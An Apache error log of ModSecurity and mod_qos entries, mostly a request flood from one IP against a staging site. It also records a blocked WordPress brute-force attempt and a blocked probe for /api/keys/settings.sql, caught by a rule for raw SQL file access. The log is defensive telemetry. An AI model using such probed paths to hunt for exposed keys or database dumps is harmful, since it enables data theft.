[Tue May 26 19:54:13.337525 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HDwAAAfE"]
[Tue May 26 19:54:13.342156 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOMwAAACE"]
[Tue May 26 19:54:13.352489 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HEQAAAdw"]
[Tue May 26 19:54:13.353536 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HGAAAAfs"]
[Tue May 26 19:54:13.378491 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOSQAAAEs"]
[Tue May 26 19:54:13.383135 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszORQAAAAI"]
[Tue May 26 19:54:13.386056 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszORgAAAHg"]
[Tue May 26 19:54:13.386946 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszORwAAAEc"]
[Tue May 26 19:54:13.397941 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOSAAAAHk"]
[Tue May 26 19:54:13.403945 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOSwAAAEQ"]
[Tue May 26 19:54:13.411885 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOTQAAAE8"]
[Tue May 26 19:54:13.415272 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOWgAAAHc"]
[Tue May 26 19:54:13.420555 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOWwAAABY"]
[Tue May 26 19:54:13.422365 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszONAAAADc"]
[Tue May 26 19:54:13.433758 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOSgAAAH8"]
[Tue May 26 19:54:13.437541 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOTAAAACo"]
[Tue May 26 19:54:13.437607 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOUAAAAA4"]
[Tue May 26 19:54:13.446560 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDFZMwN0DpLVWo6K3iAAAAKU"]
[Tue May 26 19:54:13.449936 2026] [security2:error] [pid 93868:tid 94342] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HOQAAAeM"]
[Tue May 26 19:54:13.569349 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4JwAAAOc
[Tue May 26 19:54:13.570186 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtDWDRMqfxdEDkoszOiQAAADg
[Tue May 26 19:54:13.576402 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4KQAAAQI
[Tue May 26 19:54:13.579236 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4KgAAAJw
[Tue May 26 19:54:13.585009 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4LAAAAPQ
[Tue May 26 19:54:13.591033 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4LQAAAKY
[Tue May 26 19:54:13.594235 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4LgAAAKQ
[Tue May 26 19:54:13.601233 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4LwAAAMQ
[Tue May 26 19:54:13.618863 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDWDRMqfxdEDkoszOigAAADM
[Tue May 26 19:54:13.699404 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDWDRMqfxdEDkoszOiwAAAAk
[Tue May 26 19:54:13.723002 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4MwAAAJ4
[Tue May 26 19:54:13.724109 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4NAAAALI
[Tue May 26 19:54:13.725047 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4NQAAALY
[Tue May 26 19:54:13.731480 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4NgAAAKU
[Tue May 26 19:54:13.736471 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4NwAAANQ
[Tue May 26 19:54:13.742660 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4OQAAAK0
[Tue May 26 19:54:13.749318 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4OgAAAM4
[Tue May 26 19:54:13.755427 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K4OwAAAOc
[Tue May 26 19:54:13.765961 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDWDRMqfxdEDkoszOjAAAADE
[Tue May 26 19:54:13.907909 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDWDRMqfxdEDkoszOjQAAAGY
[Tue May 26 19:54:14.095283 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4SAAAAJQ
[Tue May 26 19:54:14.100694 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4SQAAAJ4
[Tue May 26 19:54:14.102077 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4SwAAALY
[Tue May 26 19:54:14.102480 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4SgAAALI
[Tue May 26 19:54:14.103143 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4TAAAAKU
[Tue May 26 19:54:14.103430 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4TQAAANQ
[Tue May 26 19:54:14.103524 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4TgAAAI8
[Tue May 26 19:54:14.104560 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4TwAAALg
[Tue May 26 19:54:14.156824 2026] [security2:error] [pid 93576:tid 93612] [remote 20.219.17.202:46906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWtDWDRMqfxdEDkoszOjgAAZyE"]
[Tue May 26 19:54:14.228710 2026] [security2:error] [pid 86490:tid 86726] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/settings.sql"] [unique_id "ahWtDlZMwN0DpLVWo6K4UwAAAO8"]
[Tue May 26 19:54:14.279215 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HMAAAAco"]
[Tue May 26 19:54:14.285508 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOUgAAAFY"]
[Tue May 26 19:54:14.291583 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOXAAAAAw"]
[Tue May 26 19:54:14.310320 2026] [security2:error] [pid 86490:tid 86740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDFZMwN0DpLVWo6K3ogAAAP0"]
[Tue May 26 19:54:14.313888 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HOgAAAcE"]
[Tue May 26 19:54:14.314099 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HLQAAAg0"]
[Tue May 26 19:54:14.315857 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HOAAAAbU"]
[Tue May 26 19:54:14.316611 2026] [security2:error] [pid 93868:tid 94371] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HMQAAAgA"]
[Tue May 26 19:54:14.316673 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HPAAAAbA"]
[Tue May 26 19:54:14.320771 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HLgAAAeY"]
[Tue May 26 19:54:14.333210 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HNQAAAcI"]
[Tue May 26 19:54:14.333692 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOZAAAAHs"]
[Tue May 26 19:54:14.339029 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HOwAAAdQ"]
[Tue May 26 19:54:14.340788 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOYwAAAA0"]
[Tue May 26 19:54:14.351496 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HQwAAAgU"]
[Tue May 26 19:54:14.351949 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HPgAAAdU"]
[Tue May 26 19:54:14.364318 2026] [security2:error] [pid 86490:tid 86667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDFZMwN0DpLVWo6K3owAAALQ"]
[Tue May 26 19:54:14.364906 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDWDRMqfxdEDkoszOewAAAHQ"]
[Tue May 26 19:54:14.379401 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDUqK9k_ZUB2Vp25HSgAAAbM"]
[Tue May 26 19:54:14.390324 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K36gAAAJE"]
[Tue May 26 19:54:14.392063 2026] [security2:error] [pid 86490:tid 86664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K3_QAAALE"]
[Tue May 26 19:54:14.398267 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDUqK9k_ZUB2Vp25HTQAAAcc"]
[Tue May 26 19:54:14.400162 2026] [security2:error] [pid 86490:tid 86674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K34gAAALs"]
[Tue May 26 19:54:14.410101 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HQgAAAc8"]
[Tue May 26 19:54:14.416929 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K36AAAAI0"]
[Tue May 26 19:54:14.424712 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDWDRMqfxdEDkoszOegAAAEU"]
[Tue May 26 19:54:14.435583 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K36wAAAK8"]
[Tue May 26 19:54:14.442219 2026] [security2:error] [pid 86490:tid 86641] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4BQAAAJo"]
[Tue May 26 19:54:14.551026 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4hgAAAOU
[Tue May 26 19:54:14.552820 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4hwAAAJQ
[Tue May 26 19:54:14.553928 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4iAAAAOE
[Tue May 26 19:54:14.554791 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDmDRMqfxdEDkoszOqQAAAAM
[Tue May 26 19:54:14.555897 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4igAAAQQ
[Tue May 26 19:54:14.558380 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDmDRMqfxdEDkoszOqgAAAE8
[Tue May 26 19:54:14.563962 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4iwAAAN0
